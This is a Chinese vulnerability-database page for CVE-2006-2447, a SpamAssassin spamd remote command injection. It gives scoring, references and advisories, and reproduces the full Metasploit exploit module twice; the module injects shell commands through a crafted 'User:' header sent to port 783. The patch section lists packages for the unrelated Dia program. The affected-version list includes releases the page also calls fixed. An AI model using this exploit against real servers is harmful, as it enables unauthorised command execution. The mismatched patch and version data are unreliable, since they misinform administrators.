CVE-2006-2447
CVSS5.1
发布时间 :2006-06-06 17:06:00
修订时间 :2011-04-07 00:00:00
NMCOEPS    

[原文]SpamAssassin before 3.1.3, when running with vpopmail and the paranoid (-P) switch, allows remote attackers to execute arbitrary commands via a crafted message that is not properly handled when invoking spamd with the virtual pop username.


[CNNVD]SpamAssassin Vpopmail/Paranoid选项 远程命令执行漏洞(CNNVD-200606-155)

        SpaAssassin是一款用于过滤垃圾邮件的解决方案。
        Spamassassin的spamd守护程序处理对其传送的虚拟pop用户名的方式存在漏洞。如果站点运行着有--vpopmail和--paranoid标记的spamd的话,能够连接到spamd守护程序的远程用户就可以以运行spamd用户的权限执行任意命令。
        

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:apache:spamassassin:3.1.2Apache Software Foundation SpamAssassin 3.1.2
cpe:/a:apache:spamassassin:3.1.0Apache Software Foundation SpamAssassin 3.1.0
cpe:/a:apache:spamassassin:3.1.1Apache Software Foundation SpamAssassin 3.1.1

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:9184SpamAssassin before 3.1.3, when running with vpopmail and the paranoid (-P) switch, allows remote attackers to execute arbitrary commands vi...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2447
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2447
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-155
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/18290
(PATCH)  BID  18290
http://www.redhat.com/support/errata/RHSA-2006-0543.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2006:0543
http://www.nabble.com/ANNOUNCE%3A-Apache-SpamAssassin-3.1.3-available%21-t1736096.html
(PATCH)  CONFIRM  http://www.nabble.com/ANNOUNCE%3A-Apache-SpamAssassin-3.1.3-available%21-t1736096.html
http://www.debian.org/security/2006/dsa-1090
(VENDOR_ADVISORY)  DEBIAN  DSA-1090
http://secunia.com/advisories/20443
(VENDOR_ADVISORY)  SECUNIA  20443
http://secunia.com/advisories/20430
(VENDOR_ADVISORY)  SECUNIA  20430
http://xforce.iss.net/xforce/xfdb/27008
(UNKNOWN)  XF  spamassassin-spamd-command-execution(27008)
http://www.vupen.com/english/advisories/2006/2148
(VENDOR_ADVISORY)  VUPEN  ADV-2006-2148
http://www.trustix.org/errata/2006/0034/
(UNKNOWN)  TRUSTIX  2006-0034
http://www.securityfocus.com/archive/1/archive/1/436288/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060607 rPSA-2006-0096-1 spamassassin
http://www.mandriva.com/security/advisories?name=MDKSA-2006:103
(UNKNOWN)  MANDRIVA  MDKSA-2006:103
http://www.gentoo.org/security/en/glsa/glsa-200606-09.xml
(UNKNOWN)  GENTOO  GLSA-200606-09
http://securitytracker.com/id?1016235
(UNKNOWN)  SECTRACK  1016235
http://securitytracker.com/id?1016230
(UNKNOWN)  SECTRACK  1016230
http://secunia.com/advisories/20692
(VENDOR_ADVISORY)  SECUNIA  20692
http://secunia.com/advisories/20566
(VENDOR_ADVISORY)  SECUNIA  20566
http://secunia.com/advisories/20531
(VENDOR_ADVISORY)  SECUNIA  20531
http://secunia.com/advisories/20482
(VENDOR_ADVISORY)  SECUNIA  20482

- 漏洞信息

SpamAssassin Vpopmail/Paranoid选项 远程命令执行漏洞
中危 设计错误
2006-06-06 00:00:00 2013-01-08 00:00:00
远程  
        SpaAssassin是一款用于过滤垃圾邮件的解决方案。
        Spamassassin的spamd守护程序处理对其传送的虚拟pop用户名的方式存在漏洞。如果站点运行着有--vpopmail和--paranoid标记的spamd的话,能够连接到spamd守护程序的远程用户就可以以运行spamd用户的权限执行任意命令。
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        DIA DIA 0.94
        Mandriva dia-0.94-6.2.20060mdk.i586.rpm
        Mandriva Linux 2006.0:
        http://wwwnew.mandriva.com/en/downloads/
        Mandriva dia-0.94-6.2.20060mdk.x86_64.rpm
        Mandriva Linux 2006.0/X86_64:
        http://wwwnew.mandriva.com/en/downloads/
        RedHat Fedora dia-0.94-13.fc4.i386.rpm
        Fedora Core 4
        http://download.fedora.redhat.com/pub/fedora/linux/core/updates/4/
        RedHat Fedora dia-0.94-13.fc4.ppc.rpm
        Fedora Core 4
        http://download.fedora.redhat.com/pub/fedora/linux/core/updates/4/
        RedHat Fedora dia-0.94-13.fc4.x86_64.rpm
        Fedora Core 4
        http://download.fedora.redhat.com/pub/fedora/linux/core/updates/4/
        RedHat Fedora dia-debuginfo-0.94-13.fc4.i386.rpm
        Fedora Core 4
        http://download.fedora.redhat.com/pub/fedora/linux/core/updates/4/
        RedHat Fedora dia-debuginfo-0.94-13.fc4.ppc.rpm
        Fedora Core 4
        http://download.fedora.redhat.com/pub/fedora/linux/core/updates/4/
        RedHat Fedora dia-debuginfo-0.94-13.fc4.x86_64.rpm
        Fedora Core 4
        http://download.fedora.redhat.com/pub/fedora/linux/core/updates/4/
        Ubuntu dia-common_0.94.0-11ubuntu1.1_all.deb
        Ubuntu 5.10:
        http://security.ubuntu.com/ubuntu/pool/main/d/dia/dia-common_0.94.0-11 ubuntu1.1_all.deb
        Ubuntu dia-common_0.94.0-5ubuntu1.2_all.deb
        Ubuntu 5.04:
        http://security.ubuntu.com/ubuntu/pool/main/d/dia/dia-common_0.94.0-5u buntu1.2_all.deb
        Ubuntu dia-gnome_0.94.0-11ubuntu1.1_amd64.deb
        Ubuntu 5.10:
        http://security.ubuntu.com/ubuntu/pool/main/d/dia/dia-gnome_0.94.0-11u buntu1.1_amd64.deb
        Ubuntu dia-gnome_0.94.0-11ubuntu1.1_i386.deb
        Ubuntu 5.10:
        http://security.ubuntu.com/ubuntu/pool/main/d/dia/dia-gnome_0.94.0-11u buntu1.1_i386.deb
        Ubuntu dia-gnome_0.94.0-11ubuntu1.1_powerpc.deb
        Ubuntu 5.10:
        http://security.ubuntu.com/ubuntu/pool/main/d/dia/dia-gnome_0.94.0-11u buntu1.1_powerpc.deb
        Ubuntu dia-gnome_0.94.0-5ubuntu1.2_amd64.deb
        Ubuntu 5.04:
        http://security.ubuntu.com/ubuntu/pool/main/d/dia/dia-gnome_0.94.0-5ub untu1.2_amd64.deb
        Ubuntu dia-gnome_0.94.0-5ubuntu1.2_i386.deb
        Ubuntu 5.04:
        http://security.ubuntu.com/ubuntu/pool/main/d/dia/dia-gnome_0.94.0-5ub untu1.2_i386.deb
        Ubuntu dia-gnome_0.94.0-5ubuntu1.2_powerpc.deb
        Ubuntu 5.04:
        http://security.ubuntu.com/ubuntu/pool/main/d/dia/dia-gnome_0.94.0-5ub untu1.2_powerpc.deb
        Ubuntu dia-libs_0.94.0-11ubuntu1.1_amd64.deb
        Ubuntu 5.10:
        http://security.ubuntu.com/ubuntu/pool/main/d/dia/dia-libs_0.94.0-11ub untu1.1_amd64.deb
        Ubuntu dia-libs_0.94.0-11ubuntu1.1_i386.deb
        Ubuntu 5.10:
        http://security.ubuntu.com/ubuntu/pool/main/d/dia/dia-libs_0.94.0-11ub untu1.1_i386.deb
        Ubuntu dia-libs_0.94.0-11ubuntu1.1_powerpc.deb
        Ubuntu 5.10:
        http://security.ubuntu.com/ubuntu/pool/main/d/dia/dia-libs_0.94.0-11ub untu1.1_powerpc.deb
        Ubuntu dia-libs_0.94.0-5ubuntu1.2_amd64.deb
        Ubuntu 5.04:
        http://security.ubuntu.com/ubuntu/pool/main/d/dia/dia-libs_0.94.0-5ubu ntu1.2_amd64.deb
        Ubuntu dia-libs_0.94.0-5ubuntu1.2_i386.deb
        Ubuntu 5.04:
        http://security.ubuntu.com/ubuntu/pool/main/d/dia/dia-libs_0.94.0-5ubu ntu1.2_i386.deb
        Ubuntu dia-libs_0.94.0-5ubuntu1.2_powerpc.deb
        Ubuntu 5.04:
        http://security.ubuntu.com/ubuntu/pool/main/d/dia/dia-libs_0.94.0-5ubu ntu1.2_powerpc.deb
        Ubuntu dia_0.94.0-11ubuntu1.1_amd64.deb
        Ubuntu 5.10:
        http://security.ubuntu.com/ubuntu/pool/universe/d/dia/dia_0.94.0-11ubu ntu1.1_amd64.deb
        Ubuntu dia_0.94.0-11ubuntu1.1_i386.deb
        Ubuntu 5.10:
        http://security.ubuntu.com/ubuntu/pool/universe/d/dia/dia_0.94.0-11ubu ntu1.1_i386.deb
        Ubuntu dia_0.94.0-11ubuntu1.1_powerpc.deb
        Ubuntu 5.10:
        http://security.ubuntu.com/ubuntu/pool/universe/d/dia/dia_0.94.0-11ubu ntu1.1_powerpc.deb
        Ubuntu dia_0.94.0-5ubuntu1.2_amd64.deb
        Ubuntu 5.04:
        http://security.ubuntu.com/ubuntu/pool/universe/d/dia/dia_0.94.0-5ubun tu1.2_amd64.deb
        Ubuntu dia_0.94.0-5ubuntu1.2_i386.deb
        Ubuntu 5.04:
        http://security.ubuntu.com/ubuntu/pool/universe/d/dia/dia_0.94.0-5ubun tu1.2_i386.deb
        Ubuntu dia_0.94.0-5ubuntu1.2_powerpc.deb
        Ubuntu 5.04:
        http://security.ubuntu.com/ubuntu/pool/universe/d/dia/dia_0.94.0-5ubun tu1.2_powerpc.deb
        DIA DIA 0.93
        Ubuntu dia-common_0.93-4ubuntu2.1_all.deb
        Ubuntu 4.10:
        http://security.ub

- 漏洞信息 (16920)

SpamAssassin spamd Remote Command Execution (EDBID:16920)
linux remote
2010-04-30 Verified
0 metasploit
N/A [点击下载]
##
# $Id: spamassassin_exec.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SpamAssassin spamd Remote Command Execution',
			'Description'    => %q{
					This module exploits a flaw in the SpamAssassin spamd service by specifying
				a malicious vpopmail User header, when running with vpopmail and paranoid
				modes enabled (non-default). Versions prior to v3.1.3 are vulnerable
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2006-2447' ],
					[ 'OSVDB', '26177' ],
					[ 'BID', '18290' ],
					[ 'URL', 'http://spamassassin.apache.org/advisories/cve-2006-2447.txt' ],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 1024,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        =>
				[
					[ 'Automatic', { }],
				],
			'DisclosureDate' => 'Jun 06 2006',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(783)
			], self.class)
	end

	def exploit
		connect

		content = Rex::Text.rand_text_alpha(20)

		sploit = "PROCESS SPAMC/1.2\r\n"
		sploit << "Content-length: #{(content.length + 2)}\r\n"
		sploit << "User: ;#{payload.encoded}\r\n\r\n"
		sploit << content + "\r\n\r\n"

		sock.put(sploit)

		handler
		disconnect
	end

end
		

- 漏洞信息 (F82332)

SpamAssassin spamd Remote Command Execution (PacketStormID:F82332)
2009-10-28 00:00:00
patrick  metasploit.com
exploit
CVE-2006-2447
[点击下载]

This Metasploit module exploits a flaw in the SpamAssassin spamd service by specifying a malicious vpopmail User header, when running with vpopmail and paranoid modes enabled (non-default). Versions prior to 3.1.3 are vulnerable.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SpamAssassin spamd Remote Command Execution',
			'Description'    => %q{
					This module exploits a flaw in the SpamAssassin spamd service by specifying
					a malicious vpopmail User header, when running with vpopmail and paranoid
					modes enabled (non-default). Versions prior to v3.1.3 are vulnerable 
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2006-2447' ],
					[ 'OSVDB', '26177' ],
					[ 'BID', '18290' ],
					[ 'URL', 'http://spamassassin.apache.org/advisories/cve-2006-2447.txt' ],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 1024,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},			
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => 
				[
					[ 'Automatic', { }],
				],
			'DisclosureDate' => 'Jun 06 2006',
			'DefaultTarget'  => 0))

			register_options(
			[
				Opt::RPORT(783)
			], self.class)
	end

	def exploit
		connect

		content = Rex::Text.rand_text_alpha(20)

		sploit = "PROCESS SPAMC/1.2\r\n"
		sploit << "Content-length: #{(content.length + 2)}\r\n"
		sploit << "User: ;#{payload.encoded}\r\n\r\n"
		sploit << content + "\r\n\r\n"

		sock.put(sploit)

		handler
		disconnect
	end

end

    

- 漏洞信息

26177
SpamAssassin spamd vpopmail Username Command Injection
Remote / Network Access, Context Dependent Input Manipulation
Loss of Confidentiality, Loss of Integrity Workaround, Upgrade
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

SpamAssassin contains a flaw that may allow a malicious user to execute arbitrary commands. The issue is triggered when sending shell commands in the User filed, resulting in a loss of confidentiality and integrity.

- 时间线

2006-06-06 Unknow
2006-06-09 Unknow

- 解决方案

Upgrade to version 3.1.3 or 3.0.6 as the vendor has released a patch to address this issue, or users may opt to apply the following workaround: do not use the vpopmail (-v) and paranoid (-p) modes together, or limit remote access using the allowed IPs (-A) switches.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

SpamAssassin Vpopmail and Paranoid Switches Remote Command Execution Vulnerability
Design Error 18290
Yes No
2006-06-06 12:00:00 2006-11-23 08:05:00
This issue was disclosed by the vendor.

- 受影响的程序版本

Trustix Secure Linux 3.0
Trustix Secure Linux 2.2
SpamAssassin SpamAssassin 3.1.2
SpamAssassin SpamAssassin 3.1.1
SpamAssassin SpamAssassin 3.1
SpamAssassin SpamAssassin 3.0.5
SpamAssassin SpamAssassin 3.0.4
SpamAssassin SpamAssassin 3.0.3
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
SpamAssassin SpamAssassin 3.0.2
SpamAssassin SpamAssassin 3.0.1
SpamAssassin SpamAssassin 3.0
SpamAssassin SpamAssassin 2.64
SpamAssassin SpamAssassin 2.63
SpamAssassin SpamAssassin 2.60
SpamAssassin SpamAssassin 2.55
SpamAssassin SpamAssassin 2.50 0
SpamAssassin SpamAssassin 2.44
SpamAssassin SpamAssassin 2.43 0
+ Gentoo Linux 1.4 _rc2
+ Gentoo Linux 1.4 _rc1
SpamAssassin SpamAssassin 2.42 0
SpamAssassin SpamAssassin 2.41 0
SpamAssassin SpamAssassin 2.40
rPath rPath Linux 1
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux ES 4
RedHat Desktop 4.0
Red Hat Enterprise Linux AS 4
Mandriva Linux Mandrake 2006.0 x86_64
Mandriva Linux Mandrake 2006.0
Mandriva Linux Mandrake 10.2 x86_64
Mandriva Linux Mandrake 10.2
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
Gentoo Linux
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
SpamAssassin SpamAssassin 3.1.3
SpamAssassin SpamAssassin 3.0.6

- 不受影响的程序版本

SpamAssassin SpamAssassin 3.1.3
SpamAssassin SpamAssassin 3.0.6

- 漏洞讨论

SpamAssassin is prone to an arbitrary-command-execution vulnerability. This issue is due to an error in the application when processing a specially formatted input message when certain switches are set.

An attacker can exploit this issue to execute arbitrary comannds on the vulnerable computer with the privileges of the affected application.

- 漏洞利用

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com

- 解决方案

The vendor has addressed this issue in the 3.0.x strain with version 3.0.6 and in the 3.1.x strain with 3.1.3.

Please see the referenced vendor advisories for more information.


SpamAssassin SpamAssassin 2.63

SpamAssassin SpamAssassin 3.0

SpamAssassin SpamAssassin 3.0.1

SpamAssassin SpamAssassin 3.0.2

SpamAssassin SpamAssassin 3.0.3

SpamAssassin SpamAssassin 3.0.4

SpamAssassin SpamAssassin 3.0.5

SpamAssassin SpamAssassin 3.1

SpamAssassin SpamAssassin 3.1.1

SpamAssassin SpamAssassin 3.1.2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站